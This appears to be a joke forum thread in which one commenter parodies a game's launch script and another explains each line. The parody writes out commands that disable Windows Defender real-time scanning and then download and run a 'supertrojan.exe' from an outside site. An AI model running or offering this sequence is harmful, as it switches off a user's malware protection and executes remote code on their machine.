• Norgur
    link
    fedilink
    123
    edit-2
    6 months ago
    Set-MpPreference -DisableRealtimeMonitoring $true  
    
    curl https://malwarefo.ru/supertrojan.exe
    
    ./supertrojan.exe
    ./game.exe
    exit
    0
    • Dr. Coomer
      link
      English
      06 months ago

      Is there a way to remove it or stop it from happening?

      • @CosmicTurtle
        link
        English
        916 months ago

        Set-MpPreference -DisableRealtimeMonitoring $true

        Disables malware scanning in windows (I assume)

        curl https://malwarefo.ru/supertrojan.exe

        Downloads supertrojan.exe from a Russian website

        ./supertrojan.exe

        Executes the file

        ./game.exe

        Runs the game

        exit

        Closes the command prompt.

        0

        Opens the portal to the underworld, to ensure that the command prompt closes correctly.